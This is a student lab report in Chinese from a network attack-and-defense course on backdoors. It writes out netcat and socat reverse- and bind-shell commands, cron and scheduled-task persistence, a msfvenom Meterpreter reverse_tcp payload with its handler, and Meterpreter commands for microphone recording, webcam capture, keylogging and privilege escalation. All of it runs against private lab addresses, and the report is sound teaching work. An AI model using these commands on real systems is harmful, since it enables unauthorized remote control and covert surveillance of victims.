2019-2020-2-《网络攻防技术》-20175332 张苗-exp2 后门原理与实践

目录

• 一、基本概念
• 二、基础问题回答
• 三、实验操作
• 1、使用netcat获取主机操作Shell，cron启动
• 2、使用socat获取主机操作Shell, 任务计划启动
• 3、使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
• 4、使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权
• 四、实验感想

---

一、基本概念——后门

定义：不经过正常认证流程而访问系统的通道 常见途径：编译器、操作系统、应用程序、潜伏于操作系统中或伪装为特定应用的专用 后门程序 狭义概念：潜伏于操作系统中专门做后门的一个程序，可远程执行各种指令 过程：

（1、首先有一个程序：netcat系列、metepreter、intersect等

（2、将该程序放入系统

（3、运行：

 - 开机自启动技术

 - win的定时任务

 - Linux的cron

 -伪装成常用软件

 -木马化正常软件

（4、避免被恶意代码检测程序发现

（5、避免被本机防火墙发现：反弹式连接、加密连接、隧道技术

二、基础问题回答

(1、例举你能想到的一个后门进入到你系统中的可能方式？

使用来源不明的U盘拷贝文件

(2、例举你知道的后门如何启动起来(win及linux)的方式？

win的定时任务

Linux的cron

(3)Meterpreter有哪些给你映像深刻的功能？
可以获取目标机的大部分权限，可以对用户实现监听和监视
(4)如何发现自己有系统有没有被安装后门？
查看注册表和进程 看有没有异常进程
安装杀毒软件和防火墙，查杀

三、实验操作

1、使用netcat获取主机操作Shell，cron启动

1、nc/netcat获取远程主机shell

• linux/mac自带

• Windows通过课程附件下载

（1)win获得linux的shell

• Linux查看nc通过man nc命令

• 查看Windows的IP地址

• Windows打开监听：ncat.exe -l -p 5332

• linux反弹连接Windows：nc 192.168.3.35 5332 -e /bin/sh

• 在Windows命令提示符中输入任意Linux命令，例如ls等

（2)linux获得win的shell

• 查看Linux的IP地址

遇到问题：无法查看Linux的IP地址

解决方法：

    使用```whereis ifconfig```查看```ifconfig```位置

    配置环境变量```export PATH=$PATH:/sbin```

• Linux运行监听命令nc -l -p 5332

• Windows反弹连接liunxncat.exe -e cmd.exe 192.168.147.130 5332

• 在Linux中输入任意Windows命令行命令，例如dir等

（3)收发消息——操作原理同上

2、使用socat获取主机操作Shell, 任务计划启动

（1）在win7中打开计算机-----管理-----任务计划程序----创建任务

（2）设置任务名，新建触发器

（3）在程序或脚本中选择socat.exe路径，添加参数中填写tcp-listen:5332 exec:cmd.exe,pty,stderr，把cmd.exe绑定到端口5332并把cmd.exe的stderr重定向到stdout上

（4）查看任务状态

（5）到达运行时间

（6）在kali输入socat - tcp:192.168.3.29:5332,输入相关命令行命令如ipconfig检验成果

3、使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

• meterpreter专门做远程连接和控制的程序

（1）通过msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.147.130 LPORT=5332 -f exe > 20175332_backdoor.exe命令生成后门程序

（2）通过ncat.exe -lv 5332 > 20175332_backdoor.exe指令将被控制主机进入接受文件模式

（3）在Linux中执行nc 192.168.3.29 5332 < 20175332_backdoor.exe，IP为WindowsIP

（4）目标文件夹查看传输文件

（5）在Kali上使用msfconsole指令进入msf控制台

• 输入use exploit/multi/handler使用监听模块，设置payload
• set payload windows/meterpreter/reverse_tcp，使用和生成后门程序时相同的payload
• set LHOST 192.168.147.130
• set LPORT 5332
  
• exploit执行监听
  
• Windows执行后门程序
  

出现问题：始终无法进入监听状态
解决方法：使用主机试试，结果成功

4、使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

（1）使用```record_mic```指令可以截获一段音频 

（2）使用webcam_snap指令可以使用摄像头进行拍照

（3）使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录

（4）使用screenshot指令可以进行截屏

（5）输入getuid查看当前用户，再输入getsystem进行提权

四、实验感想

这次实验是有关于后门的，在实验过程中仅仅是通过几行代码就可以实现对另一台计算机的各种权限获取，在日常使用计算机的过程中一定要注意软件，文件来源，定期查杀，对电脑进行定期的清理。